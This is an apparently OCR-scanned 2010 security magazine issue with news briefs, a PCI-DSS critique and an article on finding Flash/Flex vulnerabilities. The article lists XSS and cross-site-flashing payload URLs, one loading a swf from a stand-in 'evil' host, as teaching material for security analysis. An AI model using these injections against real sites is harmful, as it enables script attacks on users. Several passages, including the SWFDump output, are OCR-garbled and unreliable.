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It's been quite a ride since the April issue of (IN)SECURE. We've been to Infosecurity Europe in 
London and met some of our dedicated readers across the channel. We took in the sun at the IBM 
Innovate 2010 conference in Orlando and learned more about the future of information security 
and other transformations coming to many aspects of our computing-fueled lifestyle. 



As this issue is released, we're looking forward to going to the US for one of the premier technical 
events of the year - Black Hat Briefings & Training 2010. If you're in Las Vegas, don't forget to join 
us for drinks at the Qualys party on July 28 at the Jet, it's going to be amazing! 

A big thanks goes to everyone who submitted their material for this issue, there's truly a lot of 
talented people in the information security field. Keep it coming! 

Mirko Zorz 
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Google now supports encrypted search 

Google just rolled out SSL encryption to Google Search. The 
option is currently in beta, therefore the users aren't automati- 
cally transferred to https. Over the years, Google started adding 
SSL capabilities to their portfolio of online products, most nota- 
bly making it the default option for all Gmail users in early 2010. 
(www. net-security.org/secworld. php?id=9323) 



Wi-Fi security patent granted for dynamic authentication and encryption 

Ruckus Wireless has been granted a patent by the USPTO for an innovation that 
simplifies the configuration, administration and strength of wireless network secu- 
rity. The new technique effectively eliminates tedious and time-consuming man- 
ual installation of encryption keys, passphrases or user credentials needed to se- 
curely access a wireless network, (www.net-security.org/secworld. php?id=9326) 



Findings of the Q1 2010 State of the Web security report 

Zscaler's newly released Q1 2010 State of the Web report details 
the enterprise threat landscape and the variety of Web-based is- 
sues plaguing Internet users. Among numerous findings, the report 
details several growing threat vectors, including attackers leveraging 
search engines and growing fake anti-virus threats, (www.net-security.org/secworld. php?id=9335) 



Goode 

O beta 
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Q&A: Symantec's acquisitions and the future 



Francis deSouza is senior vice president of the Enterprise Security Group at Syman- 
tec. In this interview he discusses Symantec's recent acquisitions, how they mitigate 
cloud computing and social networking threats, as well as Symantec's plans for the 
near future. (www.net-security.org/article.php?id=1442) 




Critical vulnerabilities in Photoshop CS4 

Critical vulnerabilities have been identified in Photoshop CS4 11.01 and earlier for 
Windows and Macintosh that could allow an attacker who successfully exploits these 
vulnerabilities to take control of the affected system. A malicious .ASL, .ABR, or .GRD 
file must be opened in Photoshop CS4 by the user for an attacker to be able to exploit 
these vulnerabilities, (www.net-security.org/secworld. php?id=9350) 




Critical i Phone security issue leaves your contents exposed 



Bemd Marienfeld has discovered that the passcode protection can be bypassed by 
simply connecting the iPhone 3GS in question to a computer running Ubuntu 
10.04. According to him, the iPhone can be tricked into allowing access to photos, 
videos, music, voice recordings, Google safe browsing database, game contents, 
and more, (www.net-security.org/secworld. php?id=9352) 



The risks when networks collide 



The increasing convergence of multiple networks for voice, data, video and other 
services onto a single infrastructure based on IP, has the potential to leave serious 
gaps in security. The new research from the ISF identifies the potential risks and re- 
wards of convergence and details four key steps to secure converged networks. 

(www. net-security.org/secworld. php?id=9356) 



IT pros are hacking their own enterprises to keep intruders out 

A survey of IT security professionals has discovered that 83% consider commer- 
cial applications to be riddled with code flaws and vulnerabilities. As a result, se- 
curity professionals are making heavy investments in penetration and code test- 
ing, combined with application scanning, to try and build security into the soft- 
ware. (www.net-security.org/secworld. php?id=9358) 




Popular websites distribute spyware-infected Mac software 



A spyware application that is installed by a number of freely dis- 
tributed Mac applications was found on a variety of websites. OSX/ 
OpinionSpy performs a number of malicious actions, from scan- 
ning files to recording user activity, as well as sending information 
about this activity to remote servers and opening a backdoor on 
infected Macs. (www. net-security.org/malware_news. php?id=1 362) 
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U.S. Senators keep trying to give "cyber emergency" powers to federal 
government 

When the officials "playing" the roles of various decision-makers tried to 
shutdown cell phone and Internet services to prevent a cascading effect, 
they discovered that federal agencies actually don't have the authority to 
do so, and that companies providing these services might be unwilling to 
do it when asked, (www.net-security.org/secworld. php?id=9365) 



Samsung smartphone shipped with mal ware-infected memory card 

The Samsung S8500 Wave phone with the Samsung bada mobile platform has been 
found being shipped to customers while containing malware on its 1GB microSD 
memory card. The malicious file is accompanied by an Autorun.inf file, which installs 
itself on any Windows PC that still has the autorun feature enabled. 

(www.net-security.org/malware_news. php?id=1 364) 



Facebook fights rogue apps with verification program 



In view of all the rogue applications that have targeted Facebook users, the an- 
nouncement that the social network will require developers to verify their account 
(by confirming their mobile phone or adding a credit card) in order to create new 
applications is a welcome one. (www.net-security.org/secworld. php?id=9367) 



Top 5 FIFA World Cup online risks 

Lavasoft warned computer users to be aware of stealthy online traps set by cyber- 
criminals to leverage public interest surrounding the 2010 FIFA World Cup - and issued 
advice to follow to make sure people enjoy the month-long tournament without becom- 
ing the target or victim of an attack, (www.net-security.org/secworld. php?id=9368) 



Rootkits on Android smartphones 

Nicholas Percoco and Christian Papathanasiou, two security researchers from 
Trustwave, have recently announced that they came up with a proof-of-concept 
kernel-level rootkit in the form of a loadable kernel module, with the help of which 
they will demonstrate an attack on a Android smartphone at the DefCon confer- 
ence next month, (www.net-security.org/secworld. php?id=9371) 



Critical Adobe Flash, Reader 0-day flaw exploited in the wild 

A zero-day flaw affecting 10.0.x and 9.0.x versions of Adobe Flash Player - including 
the current version, which is 10.0.45.2 - has been spotted being exploited in the wild. 
The flaw also affects Adobe Reader and Acrobat 9.3.2 and earlier 9.x, since the vul- 
nerable authplay.dll component ships with those products. 

AdObfi (www.net-security.org/secworld. php?id=9373) 
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U.S. intelligence analyst arrested for passing on classified items to Wikileaks 



A 22-year old Army intelligence analyst has been arrested by U.S. Federal officials 
after he boasted about providing Wikileaks with combat videos (including that of the 
helicopter attack made public by the site in April) and a massive amount of classified 
State Department records, (www.net-security.org/secworld. php?id=9374) 



The termination of a spyware business 



The FTC is announcing a settlement that bars the sellers of the "RemoteSpy" 
keylogger from advertising that the spyware can be disguised and installed on 
someone else's computer without the owner's knowledge. It requires that the 
software provide notice that the program has been downloaded and obtain con- 
sent from computer owners before the software can be installed. 
(www.net-security.org/malware_news. php?id=1 368) 



1 in 10 IT pros cheat on an IT audit 



According to a recent survey of 242 IT professionals mainly from organizations 
employing 1000 to 5000+ employees, 1 in 10 admitted that either they or a col- 
league have cheated to get an IT audit passed. Amongst the cheaters, lack of time 
and resources are cited as the main reasons, underlining the ever increasing pres- 
sure on today's IT departments, (www.net-security.org/secworld. php?id=9378) 



114,000 iPad owners' emails and account IDs exposed 

News that vulnerabilities on the AT&T network allowed a group calling itself Goatse 
I Security to harvest emails and AT&T authentication IDs of 114,000 early-adopters of 

I 1 Apple's iPad shocked potential victims. Goatse Security has a history of warning 
» ■ about security vulnerabilities, and they managed to get their hands on the data by us- 
ing a script on the AT&T's website, (www.net-security.org/secworld. php?id=9392) 



Mass SQL injection attack compromises IIS/ASP sites 

Thousands of websites and who knows how many visitors were affected by the re- 
cently discovered mass SQL injection attack that targeted - among others - The Wall 
Street Journal and The Jerusalem Post websites. Further investigation into the matter 
revealed the common denominator: all sites are hosted on IIS servers and use 
ASP.net. (www.net-security.org/secworld. php?id=9395) 



0-day Windows flaw published by Google researcher 



Tavis Ormandy, the well-known Google security researcher who discovered the 
feature/vulnerability in Java and forced Sun to patch it up swiftly by releasing the 
details to the public - has done it again. The vulnerability exists in the Windows 
Help and Support Center function (helpctr.exe) and affects only Windows XP and 
Windows Server 2003. (www.net-security.org/secworld. php?id=9401) 
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PCI: Security's owest common denominator 




by Dimitri McKay 




"Lowest Common Denominator" (as defined by Webster's Dictionary) is 
"often used to indicate a lowering of quality resulting from a desire to find 
common ground for many people." 



Frankly, I think this description is lacking. I 
was never great with math, but I do know net- 
work security. And I know that the current PCI- 
DSS standards require the absolute minimum 
level of security. 

Heartland Payment Systems was, to date, the 
largest breach in history, with tens of millions 
of credit and debit card data stolen. Yet, the 
company had been deemed PCI compliant 
just weeks before. The CEO of Heartland 
Payment Systems knew that PCI wasn't 
enough to secure Heartland against a sophis- 
ticated cyber attack, and even admitted it on 
an earnings call with analysts on November 4, 
2008. 

He said, "We also recognize the need to move 
beyond the lowest common denominator of 
data security, currently the PCI DSS stan- 
dards for processing secure transactions, one 
which we have the ability to implement without 
waiting for the payments infrastructure to 
change." The CEO of the corporation who suf- 
fered the largest credit card data breach in 



history readily confirmed that "PCI compliance 
doesn't mean secure." 

Instead of going the extra mile and erring on 
the side of safety, Heartland's executives ig- 
nored the warning signs and took the cheap- 
est route. They treated PCI like the 'ceiling' 
when it should be the 'floor' for security. That's 
unfortunate, knowing how profitable the credit 
card business can be. 

Now, PCI DSS has been a great way to force 
the enterprise into creating a budget for and 
rolling out security. However, these budgets 
are being spent not on the best security solu- 
tions, but on specific security products that are 
outlined in particular PCI controls. 

It's a catch 22 - the only way for an IT group to 
advance their security programs beyond the 
baseline requirements it to justify the spend, 
yet the only justification people have is PCI. 
PCI is just too bare-boned when it comes to 
prescribing good security. 
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Most people forced to bring a company up to PCI compliance 

have lost sight of the original goal. 



For too long the question has been "how does 
this make us compliant?" - instead of "how 
does this make us safer?" PCI has forced 
companies to do more, but not enough. If PCI 
is going to be a standard, we should raise the 
bar on that standard. 

Of the breaches in 2009, 81% of vendors 
were not PCI compliant. To be clear, that 
means that 81 % of the vendors couldn't even 
attain the lowest level of security required. 
Heartland was PCI compliant, and yet they 
were still not secure. Also, 41% of businesses 
couldn't even pass a PCI audit of the 2006 
standards - never mind the current standards. 



Most people forced to bring a company up to 
PCI compliance have lost sight of the original 
goal. PCI DSS was created as a way of reduc- 
ing security breaches and credit card fraud, 
because consumers were losing of faith in 
their credit cards. The problem is that asses- 
sors often just focus on the actual controls of 
PCI, and not the spirit PCI was created in. 
They simply don't understand why PCI was 
written, or what sort of risk it was built to miti- 
gate. 

Obviously PCI compliance won't make it im- 
possible for hackers to steal data. However, it 
should make it harder. 



The imperative for companies is to concentrate on baseline 
security, not on PCI-scope-related-checkbox-security. 



As Dr. Anton Chuvakin would say: "Security 
first, compliance is the result." Unfortunately, 
the mindset of the enterprise is to fear not the 
hacker, but the auditor. And that's not the right 
mentality to have. PCI DSS shouldn't be the 
basis of an information security policy. Just 
think about it - that's asking VISA and Mas- 
terCard to define your security policy while ig- 
noring other major threats. That's madness. 
Complacency that stems from compliance to 
a standard is unacceptable. 

As someone who helps customers attain PCI- 
DSS compliance, I've witnessed on more than 
one occasion an executive say "I might get 
fined, but that's a risk I can take." What? 
That's your concern? The fine? That's an epic 
fail. It is the attacker you need to be con- 
cerned with. Sure, PCI will fine you, but that's 
just money. What about a public breach, what 
about the damage to company image, the 
damage to your customers or even the 



damage to employee Pll? 

Now don't get me wrong. I appreciate PCI, 
because it continues to push that 90% of 
companies that are below the acceptable level 
of security, into spending money on a base- 
line. PCI in its current revision is not perfect, 
but it has certainly forced a number of compa- 
nies to step up. The industry is safer with PCI. 

The imperative for companies is to concen- 
trate on baseline security, not on PCI-scope- 
related-checkbox-security. Use PCI as the 
lowest common denominator, and go well be- 
yond that. Don't fear the auditor, fear the 
hacker, and adjust your security for that. The 
fine from PCI is much less of a threat than the 
negative media, and damage control that 
comes from a data breach. 

We can do better. 



Dimitri McKay is a Security Architect at LogLogic (www.loglogic.com). He is a Log Evangelist working with 
LogLogic customers to identify and alleviate challenges in forensics, operations or compliance to industry 
mandates and government regulations. Public speaker, blogger, and writer for both industry and trade 
publications in both print and digital format. 
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Tired of seeing your employees and 
customers being phished? 



With many targeted phishing attacks making it past some of the best 
anti-spam filters, users have become the last line of defense against 
phishing. Visit our website and find out how our fun and effective train- 
ing solutions can significantly reduce the chance of your employees 
and customers falling for phishing attacks. 

With the most comprehensive suite of anti-phishing training and filter- 
ing solutions, Wombat Security Technologies has established itself 
as a global leader in the fight against phishing. Our solutions have 
been licensed for use in sectors as diverse as finance, government 
and health care to name just a few. 

Contact us at sales@wombatsecurity.com and find out how our so- 
lutions can help effectively train your employees and customers. 



ww w. worn batsec u rity.com 
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Analyzing Flash-based 
RIA components and 
Wgpjscovering vulnerabilities 

by Rishita Anubhai and Shivang Bhagat 



The development of the Information Web can be presented synoptically as: 




Static Web Pages 



Minimal Client 'back 
to' Server Interaction 



Weak User End in 
terms of capabilities 




Interactivity is the 
Keyword! 



AJAX, Flash, Silverirghf, RIA 



Blags, Wikis, Social 
Network! ng Applications 



Wr-h 1.0 



Web 2,0 



Figure 1 - Quick comparison between 1.0 and 2.0. 



Furthermore, depending on the perspective of 
various people, the next era will most likely be 
about "living" on the web with virtual worlds, 
avatars and the like. Hence in this scenario, 



where "interactivity" and "RIA (Rich Internet 
Applications)" are the key terms for any func- 
tionality in the web (as shown in Figure 1 - 
Web 2.0), client side technologies have also 
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evolved to keep pace with the changing de- 
mands. Client side scripting facilities make in- 
teraction not just possible but also smooth for 
the client without having to go to the server 
each time for every little interaction that the 
user does. One of these client side technolo- 
gies is Flash - the topic of discussion for this 
paper. Flash was initially centered on pas- 
sively providing animations and movies for the 
end user. From that, it grew to incorporate cer- 
tain procedural features with the Scripting 
Language provision of ActionScript 1 .0 and 



2.0. Today it allows for the running of Action- 
Script 3.0 which is an object oriented scripting 
language and supports high end interactivity 
features and programming (as shown in 
Figure 2). 

But when a technology is ripening, so are the 
malicious intents towards the same and that is 
precisely why this domain of Flash applica- 
tions and corresponding security needs to be 
looked into. 



Flash providing passive Procedural Support: HI Object Oriented Scripting 

Movies and Animations H| ActionScript 1.0 and 2.0 Support: ActionScript 3.0 



Figure 2 - Flash technology transformation. 



A closer look at Adobe's major initiatives 

The three major initiatives taken by Adobe 
with respect to this domain are: 

• Flash 

• Flex 

• Adobe Integrated Runtime (AIR). 



While Flash and Flex provide facilities for 
building interactive applications with subtle dif- 
ferences as highlighted below, AIR covers a 
larger sphere. 

The subtle differences between Flash and 
Flex can be summarized thus: 



Flash 

Centered on animation facilities with respect to 
time, therefore predominant features being Timeline 
Based Development. 

The framework and environment is relatively freer 
and the developers can approach it from various 
perspectives. 



Flex 

Centered on the development of Rich Internet Ap- 
plications (RIA), therefore predominant features be- 
ing User Interface and Interaction Elements. 

• Project Framework is provided 

• Insistence on extending Flex Classes and 
such other programming framework unlike 
the creative freedom in Flash. 



Target Developers are those with an artistic motive. Target Developers are those with the motive of de- 
velopment of Web, RIA applications. 

Table 1 - Quick view: Flash vs. Flex. 



The architecture of the Flash and Flex applica- 
tions is similar and so shall be discussed in 
the next section with interchangeable names 
unless specified otherwise. On the other hand, 
AIR provides a platform for the development 
of Rich Internet Applications with a variety of 
technologies which include: Flash, Flex, HTML 
and Ajax. 



AIR applications have been viewed as easy 
yet powerful to use and the platform is a boon 
to the developers, who can develop innovative 
applications in a much easier manner, with 
minimal changes, and make the application 
work also in offline model as a desktop 
application. 
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Architecture of Flash-based 
applications 

The bigger picture: Basic Web application 
architecture 

Web applications are generally based on a 
three-tier approach, which can be extended to 
n-tier as per the individual requirements of the 
application. The three tiers are shown in 
Figure 3 below. 

When it comes to a thin client, the Presenta- 
tion (Browser Display) is the only layer located 



on the client, whereas the other two layers re- 
side on the server. But, when thick clients are 
involved, they are used to their full capacity by 
having parts of the Application layer also on 
the client. Forrester Research, a major 
technology-consulting firm, called this concept 
"The Executable Internet or the X Internet". As 
a result, client side scripts that execute com- 
pletely on the client and within the browser 
have been introduced. 

Moreover, the above architecture can be ex- 
panded as and when needed to have more 
layers depending on the business logic 
involved and other such aspects. 



web 2.0 
Thick Clients 



EarlierThin Clients 




esentation 



Application 




rowser Elements 



Scri pts wri tte n pe rta i n i ng to 
|4| the application 



Storage 




database and Other Storage 





Figure 3 - Application layers. 



Architecture of Flash as an X Internet Tool 

Flash is one of the tools of the Executable 
Internet, which - as mentioned earlier - has 
begun as a utility for web animation, and has 
become one that supports the robust object 
oriented scripting language ActionScript and 
can be used to develop applications that allow 
the user to interact with the application. 

In this architecture, the scripts that run on the 
client allow for smoother execution of certain 
actions in response to the user, without requir- 
ing frequent communication with the server. In 
this respect, Flash effectively provides a rich 
layer of interactive programmability on top of 
the existing HTML page standards. This is 
also the primary reason why the concept of 
Rich Internet Applications was coined. 

For example, without using the "Back" button 
and resending requests, the user can keep 
changing the features he wants on a Flash- 
based web application for buying a new car. 
On each change, the current combination of 



features would be modeled and shown to the 
user in a corner almost immediately without 
having to submit the list each time to the 
server and waiting for a reply to the same. 

• In Figure 4, the Front End of these applica- 
tions comprises of the browser along with the 
required plug-in for the Flash player. 

• Scripts then allow interaction and guide the 
user through the displayed Flash Web applica- 
tion. To run the scripts, continuous communi- 
cation with the server is not required, unless 
another URL is explicitly needed (as will be 
seen later when discussing the getURL 
function). 

• At the Back End, as and when needed, calls 
are made to the server via application service 
protocols. Application protocols are those that 
operate as a layer on top of the TCP/IP stack 
and provide mechanisms for RIA communica- 
tions as highlighted in the block diagram on 
the following page. 
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Flu ii Scripts »lely on the 
client find interact to the 
client lo give responses 
in ogi din in t- (1 in ilie «ftri(jt 



Load the Flash Web Appl ication 




This communication decurs via application 
service protocols such as JSON, AMF 



Figure 4 - Communication within Flash based RIA 



- XML is simple to understand and supported 
on a much wider scale than JSON and AMF 
(detailed below). As a result, in case of APIs 
published for a web application, they com- 
monly provide XML interfaces to adapt easily, 
but over which the JSON and AMF can then 
be provided if required. 

- JSON (JavaScript Object Notation) is a 
much more efficient protocol and one de- 
signed especially for the JavaScript language. 
Despite this, it is not strictly dependent on the 
JavaScript language and has parsers for 
many programming languages in general. 

-AMF (Action Message Format) is Adobe's 
own RPC (Remote Procedure Call) that is 
predominantly used for Flash and Flex web 
applications' remote communication. It com- 
prises actions such as Gateway Connection, 
Service Access, Callback Method Access and 
further processing after which response is 
sent back. It is largely used for Rich Internet 
Applications. 

• Of these protocols/structures, JSON and 
AMF are comparatively more efficient than 
XML. On the other hand, they also require 
support for specific encoding and decoding. 
The choice then depends on the platform - i.e. 
AJAX is more likely to use JSON while it 
would be more natural for Flash and Flex ap- 



plications to use AMF. The final choice rests 
with the developers and the designers of the 
individual services. 

This summarizes the architecture of web ap- 
plications and specifically Flash-based appli- 
cations work, and the mechanisms that sup- 
port the functioning of these applications - 
providing the users with a richer experience 
on the Internet and a smoother one with fewer 
interactions with the server and shorter waiting 
times. 

The Flash security model in a nutshell 

The Flash security model has two main 
concepts: 

• Stakeholders - This concept details the 
rights of various people involved in a Flash 
application from different perspectives, such 
as developers, web site administrators and 
end users. 

• Sandboxes - This concept helps in 'fencing' 
each accessibility area of the SWF files i.e. to 
restrict their access to a limited virtual web 
area and files. There are various types of 
sandboxes depending on the area of concern. 
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Stakeholders' Hierarchy- Adobe Flash Security Model 



Ad m ini strato r Setti ngs 



Responsible for security settings 
_^ during the installation of the 
wo rk i ng e n vi ro n m cnt , 



User Settings 



Control specific security settings 
customized per user and associate 
trusted status to specific set of 
files, 



Website Settings 



Author Settin 




Control the server content access 
based on policy files - specify the 
permitted domains outside the 
sandbox. 



Access to cross scripting APIs and 
can allow data requests and 
responses across domains 
lowest in the hierarchy 
allowed domains can 
superseded by policy files 



As 
this 
b 



Figure 5 - Summarizing the Stakeholder Concept of the Flash Security Model. 



Sa n d box C I a ssi f i cat i on 



With File- 
system 



Permits the 
SWF in this 
sandbox to 
access only 
other files on 
the file-system. 



With 
Networking 



Permits the 
SWF in this 
sandbox to 
access only 
other files on 
external 
domains on the 
network. 



Trusted 



External 




■ 







Permits both 

features i.e. 

access to local 
file-system as 

well as the 
network 
domains. 



Permits access to 
the same 
domain only, For 
access to other 
domains, strict 
procedures, 
policy files arc 
needed. 



Figure 6 - Synopsis of the Sandbox Model of Flash Security. 



Approaches for security analysis 

The analysis of a Flash application from a se- 
curity point of view can be based on two 
approaches: 

• Reverse engineering Flash components 

• Protocol analysis. 



I. Reverse engineering Flash components - 
Tool support: SWFDump 

Reverse engineering Flash components con- 
sists of starting from the .swf file (the final 
flash file to execute) and working backwards 
to a point from where the security analysis can 
be done methodically by understanding the 
exact working mechanism of the .swf file. 
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Case Study 1 : Scripts causing XSS with 
Flash-based components 

A. getURL based XSS 

The unassigned global variables such as 
those beginning with _root.*, JevelO.*, etc, 
can be assigned values by the QueryString 
Parameters. These variables and the Flash 
file's other variables - popularly known as 
'flashvars' - can be assigned and manipulated 
in this manner via the QueryString. Once that 
is done for a malicious user, the injection of 
these variables can be done into functions 
such as the getURL, which makes calls for 
URLs supplied as its parameters. Hence, 
these variables could be manipulated to hold 



an executable script like a simple JavaScript 
alert, and when injected into getURL an XSS 
(Cross Site Scripting) attack could easily take 
place. It is easy to detect such a flaw if you 
take a look at the disassembly of a simple .swf 
file provided by SWFDump. The file merely 
shows how lack of validation causes a JavaS- 
cript command to be passed successfully to 
the getURL function and is smoothly executed. 

The gravity of the danger posed by one such 
vulnerability can be estimated by seeing how 
commands other than simple alerts (such as 
key-loggers, cookie-thieves, etc.) could be 
planted through similar manipulation. Consider 
the following .swf file as it runs: 



fjC^ T C lot | Li I http://l92.l6S.ai.50/teEt3.swf 




Disable- o Cookies- CSS- Forms' Images- Information' 


Msc elan sous- ^/ i 


tesU.iwf (applKiaEton/x-s-hockwave... 



mui-hm-i-w.f 



This flashes when the '.swf 
file runs in the Internet 
Explorer Browser. 



J 



Figure 7 -Simple XSS. 

To analyze the file methodically, SWFdump is run on this file and the following is seen: 



US H ) 



The P-codes show the 
sequence to be the 
pushing of a string 
containing JavaScript 
and then the same 
string being taken as a 
parameter to getURL. 
Without any checks, 
when this is done 
sequentially it will 
cause the XSS attack 
to occur successfully. 



C;SUser=\JAishibaS swf tast >swfdunp -Dtast3.=wf 

[HEADER] Pile ueKlu: a 
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I li l' . Pi-am rate: lE.ftflflElHH 
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1 lZif, DEFIHIilXTi'LrrHW drfin^r. id HBH1 

hi!.: ] 52 DEJ-'lHliSllBPt defines ill HMM2 

! f ill£tula:<02> llnaityltsCBBJ 

! 1 > BIT HAPcn 655.35 

i 2 > BITHAPcn 1 

I 

1 fill: lina:HU - nauaTo 338.35 2B5.4U 

: fill: ea/aa ii»a:aa - iinaio sea.ea 2es.4a 

! fill: 88/92 lin*:BB - linalo 208.88 177.65 
! fill: 80/02 lins:98 - linsTo 338.35 177.65 
I fill: BB/BZ line:BB - liniTo 338.35 JBS.4B 

I H1. i. I 6 PLACEOBJECIS nlacte id BBB2 it depth 0001 

! Hatr-ij 

: i.bbb B.eaa B.ea 

! 0, BW 1.000 8.00 

[BB1] H SHCUFRflHE t 6 CUB : HH! HH.BBH HH:BB ! HH r 41 ?> 

M l. ] 34 HMCT10N 

( 31 b£ite&> action: Push String: "javascript :al#rcC'HI J y 



tig:" self" 



( ! luitis) action: Get 11*12 1 
< rt hyte;:". > .set inn: E : nd 



LMdl 1 B SHOWFRAHE 7-14 <BB ;HB: HH .:,tm Mrt:BB;Hl„t«f-JJ 

[61 e ] 2 AEH0UEORJECT2 M»mt aMttc fraa. depth Deal 

[88c] 2 DOACTIOH 

C 0 b^tas> action: Stop 

C 0 fcytes> action: End 

[BBU H SIIOMFKM1E 15 C08 :BB: Bl , K.75 

[8881 0 MM 

C:\Ussi*5\n'ishUa\ tuft*st> 
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The SWFDump output provides information 
regarding the sequence of instruction execu- 
tion, and this could prove useful in an analysis 
whose aim is to spot security loopholes. Simi- 
larly if decompiler tools are used (the above 
was a disassembly which brought us to the 
level of opcodes), the code could reveal a line 
such as: 

getURL (_root . input) ; 

Hereafter, the correction that could be made is 
to validate the string or flashvar going into the 
getURL function by checking that the string 
begins with an http or https request at the 
least. Additional mechanisms to escape 
strings and not permit '<' or '>' et cetera could 
also be included. 

B. HTML tag based injection 

It is possible to allow a Flash file to access 
HTML tags and processes at runtime. If this 



statement has not already indicated the poten- 
tial for major security breaches, the following 
discussion shall explicitly highlight it. 

This attack can be achieved only if the devel- 
oper has set htmlText to true. Although Flash 
supports very few HTML tags, an attacker can 
(and most likely will) inject these and exploit 
the few entry points that are permissible. 
Consider the following scenario: 

Here, HTML content is being set initially and 
then it is passed as a parameter to the 
getURL function discussed above. 

_root . htmlText = true ; 
getURL (_root . input) ; 

Now this is an entry point for an attack right 
away. This can be exploited in one of the 
following ways: 



http:/ /www .example.com/test flash.swf?input-<a href- "javascript: ale rtj 'XSS')' >Click </a> 

http: //www. exam pie. com /test flash. swiVmput-^irng src- "http: //evil /evil, swf" > 

http: //www. example.com/test flash. swf?input--djng src- 'javascript : ale it ('XSS')/ /.swf > 

Note how the '//' before the .swf will make 
it a comment as far as JavaScript execution 



Each of these on execution will create and at- 
tach the tags and run inside the browser's 
DOM context. As discussed previously, this 
exploit can be stretched beyond the simple 
alert command. 

C. clickTAG XSS attack - Famous Flash 
attack due to banner advertisements 

The clickTAG is made for tracking the number 
of clicks on advertisement banners on the 
web. It is possible to inject script into this tag 
as its value. Consider the following code: 

on (release) { { 

getURL (clickTAG, "_top"); 
} } 

Legitimately, it will be called in the following 
way i.e. tracking is done each time a click oc- 
curs. This could be later use to build the statis- 



tics of the number of clicks and popularity of 
the advertisement. 

<embed 

src="http : //www. example . com/Banner 
. swf ?clickTAG=http : //www. example . c 
om/ track?http : / / www . example . com" > 

But an attacker can cause XSS by passing 
value like below. 

http : //www. example . com/Banner . swf? 
clickTAG= javascript : alert ( ' XSS ' ) 

D. Exploit by 'asfunction used in conjunction 
with unsafe Flash methods' 

asfunction protocol handler is similar to the 
JavaScript protocol handler, asfunction causes 
an swf function in the Flash file to be exe- 
cuted. But there are a few unsafe functions in 
Flash listed on the following page: 
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- loadVariables() 

- loadMovie() 

- getURL() 

- loadMovie() 

- loadMovieNum() 

- FScrollPane.loadScrollContentO 

- LoadVars.load() 

- LoadVars.send() 

- LoadVars.sendAndLoad() 

- MovieClip.getURL() 

- MovieClip.loadMovie() 

- NetConnection.connect() 

- NetServices.createGatewayConnection() 

- NetSteam.playO 

- Sound. loadSound() 

- XML.Ioad() 

- XML.send() 

- XMLsendAndLoad() 

An example of the script code would be: 
loadMovie (_root . URL) 

When such a function is intended to call upon 
other domains, it becomes unsafe because 
the parameter can be exploited easily in the 
following manner: 

http : //www . example . com/ tes t_f lash . 
swf ?URL=as function : loadMovie , javas 
cript : alert ( 1 XSS 1 ) 

All the other methods above can cause XSS in 
similar ways in Flash driven RIA. It is possible 
to dump the file, discover respective pointers 
and analyze it in ways similar to the ones 
described for the case of getURL earlier. 

Case Study 2: Cross Site Flashing with RIA 

XSF (Cross Site Flashing) is very similar to an 
XSS attack. The basic concept of XSF is load- 
ing of a movie by another movie. Here the ap- 
plication is designed to load only a safe .swf 
file specifically from its own server. But if an 
XSF point is discovered it is exploited by an 
attacker by forcing another file from an un- 
trusted domain to be loaded. By using the 
XSF attack, the attacker can: 

• Load an XSS vulnerable Flash file or 

• Cause a phishing attack. 

The same functions as the ones listen above 
can lead to such XSF attacks. For example, 
consider that an application has code such as: 



loadMovieNum (_root .moviename , 1) ; 

An attacker here would inject his own movie 
and craft the URL to become: 

http : //www . example . com/XSF?moviena 
me=h t tp : / / www . xy z . com/ xs s . swf 

If the .swf file was to be dumped and the 
method searched for, this attack could be 
discovered. 

Case Study 3: Embedded SWF files within 
other SWF files - Deeper reverse engineer- 
ing 

In many cases, certain .swf files are planted to 
work around a shallow level of disassembly. 
To avoid being caught by the reverse engi- 
neers, the malicious code is planted as a .swf 
file, but embedded in another .swf file. The 
parent file is designed to look relatively sim- 
pler and not hazardous. Only on closer in- 
spection is the manipulation discovered. 

Once caught, the reverse engineering process 
can be done recursively for the child .swf file. 
Through many such levels the final malicious 
file can hidden and found as well. 

The main purpose of this case study is to 
show the recursive aspects of the reverse en- 
gineering approach. Consider an .swf file like 
the one mentioned above where the malicious 
code is not directly available in the output of 
the first dump. Running SWFDump on it 
merely gives an output where one can see a 
large list of bytes have been pushed directly 
onto the stack by commands like: 

xxxxx) + Y:Z pushbyte XX 

The bytes could continue to be pushed to a 
large number and consider a case where they 
are then stored in some array by a command 
such as: 

xxxxx) + Y:Z newarray wwwww params 
xxxxx) + Y:Z setproperty<q> 
[public] : : array 

where in all the three above commands x,Y,Z 
denote individual integers (different values in 
each command likely). 
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When looking for the "array" in the remaining 
dump, one may find the mechanism that uses 
these bytes and decrypts them by - for exam- 
ple - using a string key stored initially by a 
regular XOR loop or any other such mecha- 
nism. Therefore, the pushes can be extracted 
in a separate file and analyzed. From there, 
the bytes pushed may be extracted to a 
separate file. 

Analyzing the mechanism of the code that was 
found around the decrypting part of the "ar- 
ray", it is not very difficult to guess the kind of 
decryption used. Hence, a script in Perl, Py- 
thon or their likes can be manually written to 
decrypt the extracted bytes imitating the same 
way as was found in the parent SWFDump to 
decrypt it. On decrypting, the result could be 
another .swf file. Running a second 
SWFDump on this file is then required. If large 
hex strings are found to be pushed into the 
local registers in one of these dumps, these 
can be analyzed by trying to convert them to a 
binary file using another manual script. It 
would not be surprising if these large hex 
strings were also additional .swf files them- 
selves. At some point, SWFDump may fail to 
decrypt when it hits some malware exploit 



containing codes. Hereafter - with some 
knowledge of what to look for and the opcodes 
that SWFDump cannot parse - it is possible to 
find the problem manually. For example, the 
opcodes can be read as an .asm file and the 
mechanism of the exploit can then be 
analyzed. 

The crux of this study is that reverse engineer- 
ing may not always stop at level 0. Depending 
on the first output, the suspicious codes that 
do not make sense must be re-analyzed and, 
if need be, extracted by using small scripts 
and then once again reverse engineered. 

II. Protocol analysis 

It is also possible to identify the service point 
and server side access points from Flash 
components. The subject Flash component 
may be communicating over AMF, JSON or 
XML to these back end components (as dis- 
cussed in the previous section on architec- 
ture). These back end streams can be fuzzed 
and the attacker can discover a potential vul- 
nerability. For example, consider the following 
login component (written using Flex). 




Figure 9 - Simple login in Flex. 
We can dump this .swf by SWFDump and look for the service point for this example: 




Figure 10 - Flash message broker's end points. 
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Charle's Proxy provides AMF decoding and 
the following screenshots describe its working 
mechanisms. 



The message broker's end point can be iden- 
tified and the stream either reconstructed or 
manipulated by proxy thereafter. For example, 

u|j? AMF Message 

i |_S Header 

Body 
B k [0] 

_ Target 

! \_ Response 

S"W Content 
E-im [0] 

! source 

operation 

! !•••_ [o] 

i messageld 

i [^ dientld 

i tinneToLive 

j timestannp 

Figure 11 - AMF passing username and password admin/admin. 
At this point it is easy to fuzz the stream and a simple single quote can be passed as shown below. 
